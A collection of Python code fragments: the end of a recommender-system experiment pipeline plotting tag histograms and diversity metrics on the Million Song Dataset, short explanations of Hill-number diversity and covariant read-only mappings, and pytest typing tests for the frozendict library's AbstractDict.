model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
),
PlotUserTagHistograms(
dataset=msd_dataset,
user='c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
n_tags=20,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
),
PlotUserTagHistograms(
dataset=msd_dataset,
user='f20fd75195cf378de0bb481b24936e12aabf8a19',
n_tags=20,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
),
]
    # Compare the best tag rank to the diversity increase of users, for each
    # diversity order alpha (0: richness, 2: Herfindahl, inf: Berger-Parker)
    # and each recommendation list length.
    tasks += [
        PlotHeaviestTagRankVsPercentageIncreased(
            dataset=msd_dataset,
            model_n_iterations=N_ITERATIONS,
            model_n_factors=OPT_N_FACTORS,
            model_regularization=OPT_REGULARIZATION,
            n_recommendations=n_recommendations,
            alpha=alpha,
        )
        for n_recommendations in (N_RECOMMENDATIONS, 500, 10)
        for alpha in (2, 0, float('inf'))
    ]
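The alpha values used above select members of the true-diversity (Hill number) family: alpha=0 gives richness, alpha=2 the inverse of the Herfindahl index, and alpha approaching infinity the inverse of the Berger-Parker index. A minimal sketch of that formula follows; `true_diversity` is a hypothetical helper for illustration, not a task from this pipeline:

```python
import math


def true_diversity(proportions, alpha):
    """Hill number of order alpha for a probability distribution."""
    ps = [p for p in proportions if p > 0]
    if alpha == 0:
        return float(len(ps))  # richness: how many categories appear at all
    if alpha == 1:
        # The limit at alpha=1 is the exponential of the Shannon entropy.
        return math.exp(-sum(p * math.log(p) for p in ps))
    if math.isinf(alpha):
        return 1.0 / max(ps)  # inverse Berger-Parker: dominance of the top category
    # General case; alpha=2 yields the inverse Herfindahl index.
    return sum(p ** alpha for p in ps) ** (1.0 / (1.0 - alpha))


dist = [0.5, 0.25, 0.25]
assert true_diversity(dist, 0) == 3.0
assert abs(true_diversity(dist, 2) - 8 / 3) < 1e-9
assert true_diversity(dist, float("inf")) == 2.0
```

Higher orders weight the distribution's heaviest categories more strongly, which is why the plots above sweep alpha from 0 to infinity.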
    # Generate a summary of the metrics computed for a model
    tasks += [
        MetricsSummary(
            dataset=msd_dataset,
            model_n_iterations=N_ITERATIONS,
            model_n_factors=OPT_N_FACTORS,
            model_regularization=OPT_REGULARIZATION,
            n_recommendations_values=[10, 50, 500],
            alpha_values=[0, 2, float('inf')],
        ),
    ]
    return tasks


# File: tests/test_abstract_dict.py (repo: ominatechnologies/frozendict, MIT license)
from frozendict import AbstractDict, FrozenDict
def test_abstract_dict_typing_1():
    dct: AbstractDict[str, str] = {"k_1": "v_1"}
    assert dct["k_1"] == "v_1"

    dct: AbstractDict[str, str] = FrozenDict({"k_1": "v_1"})
    assert dct["k_1"] == "v_1"


def test_abstract_dict_typing_2():
    def f_1(dct: AbstractDict[str, str]):
        assert dct["k_1"] == "v_1"
        f_2(dct["k_1"])

        # Mypy should not accept the following, but there is no equivalent to
        # "pytest.raises" for asserting such failures, which is why the
        # following is commented out.
        #
        # f_3(dct["k_1"])

    def f_2(val: str):
        # print(f"f_2 {val=}")
        return val

    # noinspection PyUnusedLocal
    def f_3(val: int):
        # print(f"f_3 {val=}")
        return val

    f_1({"k_1": "v_1"})
    f_1(FrozenDict({"k_1": "v_1"}))
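The commented-out calls above exist because mypy has no runtime analogue of `pytest.raises` for asserting that a call is rejected. For the positive direction, one lighter option is `typing.assert_type` (available from Python 3.11; the `lookup` helper below is a hypothetical sketch, not part of this test suite). It is a no-op at runtime, but a type checker verifies that the inferred type matches:

```python
try:
    from typing import assert_type  # Python 3.11+
except ImportError:
    # Runtime no-op fallback for older interpreters, mirroring the real one.
    def assert_type(val, typ):
        return val


def lookup(dct: "dict[str, str]", key: str) -> str:
    value = dct[key]
    # No-op at runtime; a type checker errors if the inferred type is not str.
    assert_type(value, str)
    return value


assert lookup({"k_1": "v_1"}, "k_1") == "v_1"
```

Asserting that the checker *rejects* a call still requires tooling outside the pytest run, such as mypy's own expected-error comment convention.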
def test_abstract_dict_typing_3():
    class ClassA:
        pass

    class ClassB(ClassA):
        pass

    def f_1(dct: AbstractDict[str, ClassA]):
        f_2(dct["k_1"])

        # Mypy should not accept the following, but there is no equivalent to
        # "pytest.raises" for asserting such failures, which is why the
        # following is commented out.
        #
        # f_3(dct["k_1"])

    def f_2(val: ClassA):
        # print(f"f_2 {val=}")
        return val

    # noinspection PyUnusedLocal
    def f_3(val: int):
        # print(f"f_3 {val=}")
        return val

    f_1({"k_1": ClassA()})
    f_1(FrozenDict({"k_1": ClassA()}))
    f_1({"k_1": ClassB()})
    f_1(FrozenDict({"k_1": ClassB()}))


def test_abstract_dict_typing_4():
    class ClassA:
        pass

    class ClassB(ClassA):
        pass

    def f_1(dct: AbstractDict[str, ClassB]):
        f_2(dct)

    def f_2(dct: AbstractDict[str, ClassA]):
        return dct

    f_1({"k_1": ClassB()})
    f_1(FrozenDict({"k_1": ClassB()}))
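The pattern exercised in `test_abstract_dict_typing_4` — passing an `AbstractDict[str, ClassB]` where `AbstractDict[str, ClassA]` is expected — works because a read-only mapping can be covariant in its value type, while a mutable `dict` cannot. The same idea can be shown with the stdlib's `typing.Mapping`; this is an illustrative sketch independent of frozendict, with hypothetical `Animal`/`Dog` classes:

```python
from typing import Mapping


class Animal:
    pass


class Dog(Animal):
    pass


def count_animals(dct: Mapping[str, Animal]) -> int:
    # Mapping is read-only, so its value type parameter is covariant:
    # a Mapping[str, Dog] is accepted where Mapping[str, Animal] is expected.
    return len(dct)


dogs = {"rex": Dog()}
assert count_animals(dogs) == 1
```

A `dict[str, Animal]` parameter would reject the same argument, since a callee could then insert a `Cat` into a dict of `Dog`s; immutability is what makes the looser acceptance safe.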